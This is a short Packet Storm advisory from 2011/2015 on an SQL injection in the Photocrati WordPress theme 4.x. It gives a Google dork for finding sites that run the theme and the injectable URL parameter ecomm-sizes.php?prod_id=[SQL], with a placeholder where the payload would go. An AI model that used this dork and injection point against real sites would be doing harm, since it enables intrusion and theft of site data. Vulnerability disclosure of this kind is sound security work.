WordPress Photocrati Theme 4.x.x SQL Injection

2015-03-02T00:00:00
ID PACKETSTORM:130595
Type packetstorm
Reporter ayastar
Modified 2015-03-02T00:00:00

Description

                                        
                                            `# Exploit Title: [ wordpress theme photocrati 4.X.X SQL INJECTION ]  
# Google Dork: [ Designed by Photocrati ] also [powered by Photocrati]  
# Date: [23 / 09 / 2011 ]  
# Exploit Author: [ ayastar ]  
# Email : dmx-ayastar@hotmail.fr  
# Software Link: [ http://www.photocrati.com ]  
# Version: [4.X.X]  
# Tested on: [ windows 7 ]  
  
  
--------  
details |  
=======================================================  
Software : photocrati  
version : 4.X.X  
Risk : High  
remote : yes  
  
attacker can do a remote injection in site URL to get some sensitive information .  
=======================================================  
Exploit code :  
http://sitewordpress/wp-content/themes/[photocrati-Path-theme]/ecomm-sizes.php?prod_id=[SQL]  
  
greetz to all muslims  
:) from morocco   
`